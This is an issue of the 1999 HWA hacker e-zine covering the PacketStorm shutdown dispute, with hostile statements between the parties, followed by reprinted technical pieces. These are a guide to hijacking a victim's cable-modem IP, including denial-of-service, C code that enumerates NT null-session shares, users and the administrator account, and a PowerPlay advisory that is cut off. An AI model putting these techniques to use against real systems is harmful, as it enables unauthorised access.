*... who the fuck does JP think he is? fucking with PSS
*there goes a ton of Ken's work down the drain...fuck AntiOnline!
*(Read section AA.A)
*
*anyway enjoy this issue and shouts out to HackCanada..and Ken
*Williams ..
*
*
*/
printf ("EoF.\n");
}
Issue #23, rocking your sysadmin and hax0r asses in 99...
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
AA.A AntiOnline's JP causes the plug to be pulled on PacketStorm by Harvard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 30th AM a Call from John Vranesevich (aka JP) of AntiOnline to
Harvard started off an avalanche of events that culminated in the
plug being pulled at packetstorm.harvard.edu. Along with personal data
it was initially reported that the entire site was lost, this may now
not be the case. Included here are statements from JP, Harvard, Ken
Williams and stories from Attrition.org, HNN (http://www.hackernews.com)
and other sources.... read the sordid story below - Ed
(At this time it is uncertain wether Ken does or does not have backups of
his PacketStorm site available to him but some people on the net have
taken it upon themselves to begin a new mirror and are calling for people
that have downloaded from the site to re-upload the files to the following
url; http://packetstorm.nl.linux.org/ - Ed )
From: Ken Williams <jkwilli2@unity.ncsu.edu>
X-Sender: jkwilli2@ultra3-100lez.eos.ncsu.edu
To: The Usual Suspects: ;
Date: Thu, 1 Jul 1999 02:17:40 -0400 (EDT)
-----BEGIN PGP SIGNED MESSAGE-----
Hi,
I just got off the phone (6/30/99 PM) with one of the Harvard
Network managers. John Vranesevich, of www.AntiOnline.com,
contacted Harvard this morning and threatened to sue them
because of the content in the jp/ directory of the Packet
Storm Security web site that was located at
http://packetstorm.harvard.edu, and before that at
http://packetstorm.genocide2600.com (see www.attrition.org
for details about this info). I was told that the situation
quickly escalated to the Harvard Office of General Counsel.
John Vranesevich claims that I was using the server as a
platform to harass and threaten him, his family, and his
business. Nothing could be further from the truth. I ran
a network security related web site and archive!
The result: the server and the web site and it's contents
are permanently offline, I have no access to even retrieve
anything off of the server, the site known as "Packet Storm
Security" is history now. I was told by Leo Donnelly at
Harvard, via phone, that ALL of the content AND the backups
made are either destroyed, being destroyed now, or will be
before I can do anything to prevent it. All 4+ GB of files
in the publicly accessible directories, over 45,000 files
collected and archived over the years, are gone. There was
another 4 GB that was composed of research data, customized
IDS, Linux, Apache software, etc too.
Harvard is facing a lawsuit from JP, I am facing a lawsuit
from JP, and possibly some sort of legal action from Harvard.
Harvard seems to be trying to free themselves of any liability,
and use me as the fall guy for this whole thing. All
agreements with Harvard in the beginning were verbal (with
Jeff Gray, the senior sysadmin), so I've got nothing on paper
to back up the truth. I've got emails, but I don't have the
money or legal defense to counter Harvard, or anybody else for
that matter.
This has turned really ugly, really quickly, and it is very
plausible that I will be facing charges involving "hacking"
or computer crimes of some sort, because I "never had a
Harvard ID, and thus was not authorized to use their
facilities", and I "compromised their security." I guess it
doesn't matter that I was contacted by the Senior Sysadmin at
Harvard and invited to move my site there. It doesn't matter
that the head of Harvard UIS approved of everything. It
doesn't matter that he placed the box on a subnet of his
choosing and called me and gave me the root password and told
me I had free rein on the box. It doesn't matter that
Harvard network security was never actually compromised.
For the record, Jeff Gray, the Harvard senior sysadmin, has
been extremely supportive of my site and work from the
beginning, and he deserves ALOT of credit for going out of
his way to help keep Packet Storm Security alive and online.
In fact, Jeff Gray has provided so much support for "the
security community" in general, and is so supportive of
security-related research and projects, that he deserves all
the credit in the world for his efforts. I hope Harvard
gives him the credit he is due, because any network security
they have is in large part due to his skills, devotion, and
diligence.
If that's not enough to annoy me, all of my class work for
the class I'm taking at NCSU this summer (CSC499 Independent
Research project involving IDS) is/was on that server at
Harvard and gone now too. With 4 weeks left in the semester
here at NCSU, I have just lost seven weeks of work and data
that cannot be replaced in 4 weeks.
What bothers me the most is that all of the countless hours I
put into that web site and the archives, thousands of hours,
are gone now, for good.
The site was getting over 400,000 hits/day and doing about
10 GB/day in transfers, so I don't see it coming back online
even if I do get any of the site content back.
Obviously, I have taken full responsibility for the site
content and all activities and events associated with that
server. Even though no laws or rules were broken, on my part,
and to my knowledge, I am now facing possible legal action
from both JP and Harvard, and state/federal computer crime
charges as well.
What am I going to do now? I don't know. The web site I
devoted most of my waking hours to is gone. My chances of
passing my CSC499 class do not look good, according to the
negative comments from my professor. I'll try to salvage
the summer's worth of course work anyway if possible and pass.
Until formal charges are filed, I've still got my job and
account here at NCSU. When NCSU catches wind of this, and
I'm sure they will, my account probably will be permanently
revoked, and my job and the past three years of school will
then be gone too. Until then, I can be contacted at the email
address in the sig below.
Check out the news and history of John Vranesevich and
Carolyn Meinel's smear and harassment campaigns that have ruined
the careers and lives of many people, mine included.
www.attrition.org has all of the details.
Funny how I spent the past few years donating my time, literally
thousands and thousands of hours, to "the security community",
never asking for or making a single penny off the time and work
I invested, and have now lost it all because John Vranesevich
and a few of his IRC friends are able to make quick phone calls,
fabricate absurd stories about criminal activity, libel, threaten
to sue Harvard, and I don't even get to plead my case. I am
guilty without even being informed of what was going on.
He has effectively ruined years of my work, my education, my
career, my life.
There are really only four things that I'd like right now:
1. Justice
2. Truth
3. The 3 GB of MY data that Harvard has and refuses to turn
over to me
4. A job in the IT/IS/IW industries - the pay doesn't even matter,
I'm willing to move, I'm willing to put in 60-80 hour weeks.
Just give me a UNIX or Linux box to work from.
I'll settle for just the job though, and like I said, the pay
doesn't matter - I love computers, network security, and systems
administration. If I was not doing it for pay, I'd be doing it
for free.
See you at BlackHat and DEFCON.
take it easy,
Ken Williams
jkwilli2@unity.ncsu.edu
if you need to reach me by phone, email me at jkwilli2@unity.ncsu.edu
and CC the email to packetstorm@genocide2600.com with phone # request.
my pgp keys are available on all of the regular keyservers, and at
www4.ncsu.edu/~jkwilli2/
[Note: yes, you can quote or print any part of or the whole email.]
Ken Williams
ken@packetstorm.harvard.edu
Packet Storm Security http://packetstorm.harvard.edu
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv
iQEVAwUBN3sH3pDw1ZsNz1IXAQE67QgAt5O4cgV4UN/tNro0V9Hkrz4YJGuysf2F
aZdUuM+P73MwwlvjKFpLW5WOJwtZzFjicv6RYMlXaMLRL48Fz/rltX95dy71LCOs
/UVa9LXvh7kSgD5p/pSeP2+zyDuvbvUxjtSTIPRp68sOQTKILaQpohwl9hzpfVLz
ADvQMD5vAUqGlTeoQrZRmHC/OxtWqVEgh72Gms4XpGaGwT3OdtoRKuK0d4Js3mP9
Vs1szlsT3DQEFvdblLR/jsf8jonbME/Imo89K69wFsbyeVpIB1+g0Se11BdQCbeU
TdauQTJMfDTkIWSQvpQXXIhvukErb8D9bmFvKiE7MqS+N8RVaMO7Zw==
=7OhX
-----END PGP SIGNATURE-----
***************************************************************************
-=-
Net Thug Shuts Down Largest Free Security Site
Wed Jun 30 16:36:10 MDT 1999
ATTRITION Staff
Earlier today, the PacketStorm Security site was abruptly shut down
with no warning. PacketStorm (packetstorm.harvard.edu)
was one of the largest and most respected sites catering to security
professionals worldwide. Boasting an average of 400,000 hits a day,
pushing out roughly 10 gigs of traffic, the site was a valuable resource
to an estimated 10,000 security professionals world wide.
The security resource did not suffer at the hands of hackers or
network intruders. Instead, a new kind of malicious criminal found
success through a fear that haunts more and more Americans today.
A single piece of email from John Vranesevich (founder of AntiOnline)
to the educational institution hosting Packetstorm threatened a lawsuit if
the site was not shut down. Harvard said there were "numerous" complaints,
but provided no additional details.
Like most US institutions, the idea of being dragged to court for any
reason is enough to scare them into hasty action. With that mail,
Harvard pulled the plug. This decision was no doubt made as an easy
alternative to spending time and resources fighting the claims.
Email from Ken Williams, primary administrator for the site, to Attrition
staff indicated that not only did Harvard shut down the site, they denied
him access to the machine and all information stored on it. The correspondance
noted the likelihood that all information on the machine, and all
backups would be destroyed in order to avoid the AntiOnline lawsuit.
"All of the content and the backups made are either destroyed, being
destroyed now, or will be before I can do anything to prevent it." said
PacketStorm founder Ken Williams.
Williams went on to say that he does not fear any fraudulent lawsuit
Vranesevich could attempt to level at him. The information contained
on the site regarding Vranesevich was not in violation of any US law
that he was aware of, and had been there for over a year. Along with
the security site, months of William's own school work was lost.
"I have just lost seven weeks of [class] work and data that cannot be
replaced in 4 weeks." Williams said, referring to deadlines on the
school work.
"What bothers me the most is that all
of the countless hours I put into
that web site and the archives, thousands
of hours, are gone now, for good."
- Ken Williams, PacketStorm founder
These vague and unfounded legal threats only serve to hurt the security
community. AntiOnline's mission statement claims they exist "to educate
the public on computer security related issues." Apparently, this
mission statement forgot to include such things like "educate the public
through OUR site only" and "as long as we profit from it".
***************************************************************************
JP has since offered this news:
http://www.antionline.com/archives/editorials/packetstorm.html
( Likely suffering major DoS attacks in result of their actions I was unable
to get thru to the site to read their shit for posting here...they will burn
in hell for this action - Ed )
Ok I cut thru the cruft, here's JP's 'story';
PacketStorm Is Shut Down
An AntiOnline Editorial
Thursday , July 01 1999
Apparently for some time now, PacketStorm Security, a popular underground collection of security related tools and information, has been maintaining a vast archive of
materials about AntiOnline. These materials included entire stories, copies of the weekly mailbag, e-mails, and other materials copyrighted by AntiOnline LLP.
On top of that, and what was far more serious, the site contained dozens and dozens of items which included: e-mails, messages, documents, images, and even public
surveys. These materials were libelous, and in some cases, were blatant threats against members of my immediate family, myself, and my company.
While I value the right to free speech as much, if not more, than the average American, I do not believe in individuals posting threatening and harassing documents about
another individual, and their family members. It was for this reason, and no other, that I contacted Harvard University, which was hosting the PacketStorm Website, and
requested that it be shut down. I did not threaten legal action, but simply directed University Administration to the website, for them to view, and to judge, on their own.
Below is a copy of that letter:
Greetings:
May I first say that I did my best to see that this letter got sent to the appropriate individuals. I had some difficulty determining who those individuals may be,
so if I have made an error, I would greatly appreciate it if you would forward this letter on to the appropriate individual(s).
My name is John Vranesevich, and I am the Founder and General Partner of AntiOnline LLP, a computer security company based outside of Pittsburgh, PA.
Earlier today, one of my colleagues forwarded me the following URL:
http://packetstorm.harvard.edu/jp/
Needless to say, I was shocked and outraged at what I saw. This page contains a large archive of libelous and, to put it bluntly, sick material. Everything
from archives of copyrighted material from our website, to altered pictures of my family, to 'stories' about me which contain images ranging from people
engaged in homosexual activities, to a nun that appears to be covered in seminal fluid.
I am astounded that an institution as prestigious Harvard would be party to the dissemination of this type of material. It is my hope that the University
Administration was unaware of this site, and now that it has been brought to their attention, it is my hope that it will be dealt with promptly.
I have worked to help several educational institutions develop 'Acceptable Use Policies', and if Harvard is similar to them, the above URL would be a clear
violation of that policy.
It is my hope that the above mentioned domain will be shut down immediately, and that the individual responsible will be seriously reprimanded.
I hope to hear from you soon about this matter, and what you may have done regarding it.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
Tonight, Ken Williams, the founder of Packet Storm Security, released a letter to the public. The letter read in part:
Funny how I spent the past few years donating my time, literally thousands of hours, to "the security community", never making even a penny off the time and
work I invested, and have now lost it all because some asshole named John Vranesevich is able to make a quick phone call, fabricate absurd stories about
criminal activity and bullshit I never did, and effectively ruin years of work, my education, my career, my life.
Ken, I know what it's like to dedicate many, many, thankless hours into a project, believe me. But, you did not loose your site because of me, you lost it because of you. I
could not stand by and watch your site be used as a platform to harass and threaten my family, myself, and the business which I have worked hard to start. While you,
and others who 'follow you' may criticize me for what I did, I think everyone that's reading this, who has family members that they love, and a career that they enjoy, will
admit to themselves that if in my shoes, they would have done at least the same. I hold absolutely no grudge towards you as a person, and I hope that you have the best
of success in all that you do.
Due to the types of threats that I have been receiving, and that sites like PacketStorm have been propagating, local law enforcement agencies were put on alert, and
began doing extensive extra patrolling of the residence of my family members, my own residence, and the AntiOnline Offices. I realize that the actions that I have taken
against PacketStorm may greatly increase the immediate threat against my family, myself, and my company; and that the harassment will now only get worse. However,
I will not allow my family, myself, nor my company to become a victim. I am standing my ground, and will continue AntiOnline's mission of putting an end to malicious
hackers.
People in this country have the right to say and do whatever they please, unless that is, what they say and do infringes on the rights of another - anonymous.
Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline
-=-
***************************************************************************
Packetstorm mirror site announced at HNN: http://packetstorm.nl.linux.org/
" Support for Ken Williams Continues to Grow
contributed by Space Rogue
The outpouring of support for Ken Williams and Packet
Storm Security has been phenomenal. One such item of
support has been the beginning of an effort to rebuild
PSS from scratch as a grassroots effort. The organizer
of this is asking anyone who ever downloaded a file form
PSS to upload it here.
PacketStorm Mirror
http://packetstorm.nl.linux.org/
***************************************************************************
Statement from Harvard:
=======================
* S T A T E M E N T *
As a service to the Internet community, Harvard agreed
to host a Packet Storm Security Website for
security-related materials only. Without Harvard's
knowledge, unrelated content was put on the Harvard
server, including sexually-related material and personal
attacks on an individual not affiliated with the University.
A Harvard administrative site focused on security issues is
not the forum for this type of material. We are returning
the content on the site and hope that Packet Storm will
make its security tools available through its own Website.
Joe Wrinn
Director
Office of News and Public Affairs
Joe Wrinn
Director, Harvard News Office
1350 Massachusetts Ave., Rm. 1060
Cambridge, MA 02138
***************************************************************************
Ken's Rebuttal to the Harvard statement;
Date: 7/1/99 17:58
Received: 7/1/99 18:01
From: Ken Williams, jkwilli2@unity.ncsu.edu
Hi,
[The Harvard] statement is incorrect, and even libelous
itself by implying that I had "sexually related materal" on
the server. I NEVER did!
NOW, I will retain legal counsel. This is outrageous!
I wouldn't have been surprised to find myself slandered by
John Vranesevich and AntiOnline, but to have Harvard
implicitly state that I was serving up "sexually related
material" to the Internet is absurd, libelous, and legally
reprehensible.
Are you, Harvard, trying to ruin my reputation and career
now too?
It sounds to me like you are fabricating this "sexually
related material and personal attacks" statement to
appease your critics, and, as I (now ominously) mentioned
in my first open letter, trying to use me as the fall guy.
Regretfully,
Ken Williams
***************************************************************************
ZDNet;
ZDNN: Harvard caught in hacker crossfire
Tue, 01 April 1996 18:29:02 GMT
Harvard University is caught in the middle of an online war between hacking-scene
follower AntiOnline.com and the hacking community at large.
On Wednesday, the Cambridge, Mass., university removed an independent security
Web site, known as Packet Storm, which it had been mirroring on its servers for only 10 days.
The reason: A directory of material hidden in the Web site, and thus on Harvard's servers, that
had "sexually related material and personal attacks on an individual not affiliated with the
University," said Joe Wrinn, director of news and public affairs for Harvard, in a statement
released by Harvard on Thursday.
"We agreed to have a site that had security-related materials only," said Wrinn. "Both parties
involved were using us in a way that was completely inappropriate."
Ken Williams, a North Carolina State University employee and the Webmaster of Packet Storm, angrily
refuted the allegations.
"This statement is incorrect, and even libelous itself by implying that I had 'sexually related
material' on the server," he wrote in an e-mail. "I never did!"
According to Williams, the directory -- labeled "/jp" because it was a collection of material
satirizing AntiOnline founder and chief John P. Vranesevich -- had a parody of the AntiOnline site.
But others familiar with the site said that the parody also contained photos of nude women that were
intended to be more sarcastic than sexual. Harvard obviously didn't get the joke. Harvard's Wrinn did
not know specifically what sort of "sexual" content was contained on the site.
Harvard in the hot seat
"We are in the middle of this and it's inappropriate," said Harvard's Wrinn, sounding distinctly
uncomfortable with the attention that the issue was attracting. Harvard intends to send the complete
contents of the site back to Williams so that he can post it elsewhere.
No wonder: Packet Storm wasn't just a small-time site -- it had been the place to go for both hackers
and security experts to get up-to-date security information.
"Packet Storm was a huge compilation of security tools," said Brian Martin, known as "Jericho," one of
the Webmasters at hacker news and information site Attrition.org. "It was updated daily with tools. It
was always there."
Among organizations that used and mirrored the site: The Department of Defense and the Federal Bureau of
Investigation, claimed Webmaster Williams.
'I didn't have an anti-J.P. Temple of Hate'
Yet, Williams had also sided with many others in hacker circles who have been waging a war -- of mainly
-- words against AntiOnline's Vranesevich and his latest ally, Caroline Meinel, security researcher and
webmaster of The Happy Hacker.
"I didn't have an anti-J.P. Temple of Hate or anything," said Williams. "But there are companies,
organizations, and individuals out there that ;we believe; are black-eyes of the industry."
So, Williams attached a non-public directory to the Web site that archived parodies and criticisms of
AntiOnline's founder.
The directory represented a single facet of a complex war of image in the hacker not-so-underground. For the
most part, AntiOnline and its main foe, Attrition.org, have squared off with conflicting allegations of slander,
libel and plagiarism.
' I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a
potential suit.'
"I can understand a parody -- I have no problem with that," said the 20-year-old Pennsylvania Webmaster, adding
that he thought Williams acknowledged that the photos had been put up, but that since they had come from a source
already online, the Packet Storm Webmaster thought the pictures were fair game.
Vranesevich's answer? The Webmaster notified Harvard of the hidden directory in a letter to the university's provost
-- and Harvard quickly took the site down.
Did Harvard act too quickly?
B.K. DeLong, a Boston-based computer security consultant, thought Harvard acted too quickly.
"I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential
suit," he said. yet Harvard wasn't the only one to act quickly. By late Wednesday night, the Keebler Elves -- the
cybergang that claimed responsibility for hacking into the National Oceanic and Atmospheric Administration last week
-- defaced another government Web site with the news.
"Now, because of; JP ... Packetstorm is no more, and never will be again," the site http://www.aao.uc.usbr.gov/
lamented.
Unnamed hackers also struck at AntiOnline more directly. AntiOnline's site came under a denial-of-service attack --
which floods a particular site with random data -- so severe that its Internet service provider pulled the site for
almost 12 hours on Thursday, said Vranesevich.
Ugly threats
Other attacks were even less friendly. "I have received more death threats in the last 24 hours by phone, than I have
in five years," he said.
Not quite an apology, Vranesevich added that he never intended the entire Packet Storm site to be taken down.
"I know what it's like to have the university stomp its foot down on you. When I was a student at the University of
Pittsburgh, I had my Web site shut down," he said. "But I never threatened anyone."
In his mind, the contents of "/jp" did.
@HWA
03.0 Cable Modem Hijacking from www.hackcanada.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
Cable Modem IP Hijacking in Win95/98
The purpose of this is to show you how bad cable modems security is and that
even with a win box you can take someone else's IP. You can hijack IP's using
a cable modem and it's very simple in any operating system.
Just follow the steps:
1) Choose someone's IP that you wish to have. Make sure the IP is on the same
network. Most cable modem providers use DHCP. The fist thing you have to do is
find the victims IP. Remember the victims IP has to be in the same network and
with the same service provider for this to work.
2) Now this is probably the hardest thing in this file (but it's still easy),
you have to wait until the victims computer is off or you can Smurf kill his
connection. When you think his computer is off-line just try to ping it to see
if you get a response. Do this by going to a DOS prompt and typing ping
(victims IP). If you get a response then you have to try harder.
After you get his PC off-line then you go into your network properties and edit
the IP settings, but instead of having yours there you put the victims IP,
host, and domain.
3) Restart. If you restart and you get an IP conflict this means that the
victims computer is on, if you don't get an IP conflict then try to go to your
web browser and see if it works. With some cable modem providers you might have
to also add the Gateway, Subnet mask (255.255.55.0), Host, DNS search, and
Domain.
Now you can go. Everything will work until the victims PC is back on. Once it
is back online it will take the IP away because it will tell you that you have
the wrong Mac addresses.
*Linux*
This is also possible in Linux, but is not the best way. You can change your
Mac address to the victims PC and this is more secure and much easier. There
are a couple of scripts to change your address, just look around.
Warning: Some cable modem service providers will know when you're using the
wrong IP, but hey, it might be useful.
Copyright (c) 1999 Wildman
www.hackcanada.com
@HWA
04.0 Exploiting Null Session Weaknesses in NT environment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
Details About NULL Sessions
This page is a detailed explanation for programmatically connecting to NT Server NULL Sessions and extracting the name of the true
administrator account. Even non-programmer Admins should read through this and become familiar with the API's explained in order to
better understand the NT environment and recognize code that might be used against them.
The original purpose of NULL sessions is to allow unauthenticated hosts to obtain browse lists from NT servers and participate in MS
networking. Mostly this is useful for Win95/98/NT hosts who are not domain members, but still need to obtain browsing information.
The problem occurs in cases where a NULL session becomes included in the everyone group and now has access to resources to which
they weren't authenticated, but that the authenticated group had permissions for. Originally, 'everyone' did not mean 'anyone'. You still
had to log on to be in the everyone group. however, NULL Sessions are the one case where 'everyone' could mean 'anyone'. This is the
reason MS created the *NEW* Authenticated group. The Authenticated group does not include NULL Sessions and so can never mean
'anyone' - until someone finds an exploit.
The following code segments are commented to show exactly what is happening, what API's are being used, and how the true
administrator name can be identified.
First - making a NULL Session connection
One way to this is by using the Net Use command with an empty password. Programmatically, it looks like this....
//This function called from dialog that fills listbox with connections
BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)
{
//Setup for UNICODE
char* pTemp = TargetHost.GetBuffer(256);
WCHAR wszServ[256];
LPWSTR Server = NULL;
//Convert to Unicode
MultiByteToWideChar(CP_ACP, 0, pTemp,
strlen(pTemp)+1, wszServ,
sizeof(wszServ)/sizeof(wszServ[0]) );
//Create the IPC$ share connection string we need
Server = wszServ;
LPCWSTR szIpc = L"\\IPC$";
WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL
DWORD dwServNameLen;
DWORD dwRC;
//Setup Win32 structures and variables we need
NET_API_STATUS nas;
USE_INFO_2 ui2;
SHARE_INFO_1* pSHInfo1 = NULL;
DWORD dwEntriesRead;
DWORD dwTotalEntries;
//Set up handles to tree control to insert connection results
HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;
char sharename[256];
char remark[256];
if(Server == NULL || *Server == L'\0')
{
SetLastError(ERROR_INVALID_COMPUTERNAME);
return FALSE;
}
dwServNameLen = lstrlenW( Server );
//Test for various errors in connection string and recover
if(Server[0] != L'\\' && Server[1] != L'\\')
{
// prepend slashes and NULL terminate
RemoteResource[0] = L'\\';
RemoteResource[1] = L'\\';
RemoteResource[2] = L'\0';
}
else
{
dwServNameLen -= 2; // drop slashes from count
RemoteResource[0] = L'\0';
}
if(dwServNameLen > CNLEN)
{
SetLastError(ERROR_INVALID_COMPUTERNAME);
return FALSE;
}
if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;
if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;
//Start with clean memory
ZeroMemory(&ui2, sizeof(ui2));
//Fill in the Win32 network structure we need to use connect API
ui2.ui2_local = NULL;
ui2.ui2_remote = (LPTSTR) RemoteResource;
ui2.ui2_asg_type = USE_IPC;
ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL
ui2.ui2_username = (LPTSTR) L"";
ui2.ui2_domainname = (LPTSTR) L"";
//MAKE THE NULL SESSION CALL
nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);
dwRC = GetLastError();
if( nas == NERR_Success )
{
machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0,
TVI_ROOT);
}
//THIS IS WHERE NT HANDS OUT IT INFORMATION
nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,
MAX_PREFERRED_LENGTH,
&dwEntriesRead,
&dwTotalEntries, NULL);
dwRC = GetLastError();
if( nas == NERR_Success )
{
if(dwTotalEntries > 0)
{
shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot,TVI_LAST);
userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);
adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot,TVI_LAST);
}
for(int x=0; x<(int)dwTotalEntries; x++)
{
// Convert back to ANSI
WideCharToMultiByte(CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_netname, -1,
sharename, 256, NULL, NULL );
WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1,
remark, 256, NULL, NULL );
CString ShareDetails = sharename;
ShareDetails = ShareDetails + " - " + remark;
//fill the tree with connect info
attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);
pSHInfo1++;
}
}
//My Wrapper function for listing users - see below
DoNetUserEnum(Server, pDlg, userRoot, adminRoot);
//WE ARE DONE, SO KILL THE CONNECTION
nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);
TargetHost.ReleaseBuffer();
SetLastError( nas );
return FALSE;
}
The following function is how one can programmatically determine the administrator status of an account......
bool GetAdmin(char* pServer, char* pUser, CString& Name)
{
BOOL fAdmin = FALSE;
DWORD dwDomainName,dwSize,dwAdminVal;
SID_NAME_USE use;
PSID pUserSID = NULL; // SID for user
int rc;
int iSubCount;
bool bFoundHim = 0;
dwDomainName = 256;
dwSize = 0;
dwAdminVal = 0;
iSubCount = 0;
//Call API for buffer size since we don't know size beforehand
rc = LookupAccountName(pServer,
pUser, pUserSID,
&dwSize, szDomainName,
&dwDomainName, &use );
rc = GetLastError();
//Allocate a larger buffer
if(rc == ERROR_INSUFFICIENT_BUFFER)
{
pUserSID = (PSID) malloc(dwSize);
//Repeat call now that we have the right size buffer
rc = LookupAccountName(pServer,
pUser, pUserSID,
&dwSize, szDomainName,
&dwDomainName, &use );
}
//Scan the SIDS for the golden key - ADMIN == 500
//Get a count of SID's
iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));
//Admin SID is the last element in the count
dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));
if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN
{
Name.Format("Admin is %s\\%s\n", szDomainName, pUser);
bFoundHim = true;
}
delete pUserSID;
return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE
}
Wrapper for Listing the user accounts.....
void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM
adminRoot)
{
USER_INFO_10 *pUserbuf, *pCurUser;
DWORD dwRead, dwRemaining, dwResume, dwRC;
char userName[256];
char userServer[256];
dwResume = 0;
if(pServer[0] != L'\\' && pServer[1] != L'\\')
{
//Start sting with correct UNC slashes and NULL terminate
RemoteResource[0] = L'\\';
RemoteResource[1] = L'\\';
RemoteResource[2] = L'\0';
}
else
{
dwServNameLen -= 2; // drop slashes from count
RemoteResource[0] = L'\0';
}
if(dwServNameLen > CNLEN)
{
SetLastError(ERROR_INVALID_COMPUTERNAME);
return;
}
if(lstrcatW(RemoteResource, pServer) == NULL) return;
do
{
pUserbuf = NULL;
//THIS IS THE API THE NT USES TO HAND OUT IT's LIST
dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024,
&dwRead, &dwRemaining, &dwResume);
if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)
break;
DWORD i;
for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser)
{
// Convert back to ANSI.
WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL,
NULL );
// Convert back to ANSI.
WideCharToMultiByte( CP_ACP, 0, pServer, -1,
userServer, 256, NULL, NULL );
if(!GotAdmin)
{
//use char strings
CString Admin;
GotAdmin = GetAdmin(userServer, userName, Admin);
if(GotAdmin)
{
Admin.TrimRight();
HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);
pDlg->m_Victims.EnsureVisible(adminChild);
}
}
CString strUserName = userName;
pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);
}
if (pUserbuf != NULL)
NetApiBufferFree(pUserbuf);
} while (dwRC == ERROR_MORE_DATA);
if (dwRC != ERROR_SUCCESS)
printf("NUE() returned %lu\n", dwRC);
}
Send mail to info@ntobjectives.com with questions or comments about this document.
Copyright � 1999 NT OBJECTives, Inc. All Rights Reserved.
All trademarks are the property of their respective owners.
Last modified: June 28, 1999
@HWA
05.0 Cognos PowerPlay Web Edition security vunerability allows access to data cubes..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
Date: Mon, 28 Jun 1999 07:29:37 -0400
From: Darin White <d.w@IBM.NET>
To: BUGTRAQ@netspace.org
Subject: Cognos PowerPlay Web Edition security
WEB SECURITY ADVISORY
-------------
Release Date: 1999-06-25
Application: Cognos PowerPlay Web Edition
Severity: Unauthenticated web users can sniff cube data
Author: Darin White
Operating Sys: Microsoft NT Server
--------------
I. Description
Due to design problems as well as some potential web server
misconfiguration PowerPlay Web Edition may serve up data cubes
in a non-secure manner. Execution of the PowerPlay CGI
pulls cube data into files in an unprotected temporary
directory. Those files are then fed back to frames in the
browser. In some cases it is trivial for an unauthenticated
user to tap into those data files before they are purged.
Cognos has been contacted but does not regard this as a
serious exposure (see appendix B below).
The issues are:
(a) dynamic directory listing
(b) weak temporary filename algorithm
(c) ad hoc parameters to the CGI
II. Details
Identifying PowerPlay sites is quickly accomplished using AltaVista
http://www.altavista.com/cgi-bin/query?
pg=q&kl=XX&q=%2Blink%3Appdscgi.exe&search=Search
(join last two lines) which hits all pages containing a link to the
PowerPlay CGI ppdscgi.exe on NT.
Normal authentication for protected cubes occurs when a user selects
a link like:
<A href="/cgi-bin/ppdscgi.exe?XT=EXAMPLE&LA=en&LO=en">Example</a>
At this point the user is prompted for a userid and password.
Beyond this check there seems to be no verification that data
is being fed out to the browser that requested it and was
authorized.
(a) dynamic directory listing
Netscape Enterprise Server 3.5.1 appears to be serving up dynamic
directory listings by default. A known PowerPlay site can be hit
with a request for http://www.example.com/ppwb/Temp/ which will
return something like:
/ppwb/Temp/ -
6/25/99 9:17 AM 17904 1ad6t.htm
6/25/99 9:17 AM 37828 1ad6x.htm
Here we see two temporary files created by one initial cube request.
The suffix 't' in the first filename denotes the PowerPlay toolbar
and 'x' denotes the data content. These files are fed back to the
browser to populate two frames. Clicking on the content filename
will allow any user to browse the current cube view with no
authentication challenge even if the cube has been password-protected.
Once into the cube the user may continue to drill for further data.
(b) weak temporary filename algorithm
Sites that have disabled directory listing may still be vulnerable.
Many sites using PowerPlay offer a mix of protected and unprotected
cubes. Some sites also offer an anonymous user account (let's say
"guest" for example). The PowerPlay CGI uses a common temporary
directory for serving all cubes back to the browser. Using the
guest account or viewing an unprotected cube a user may right-click
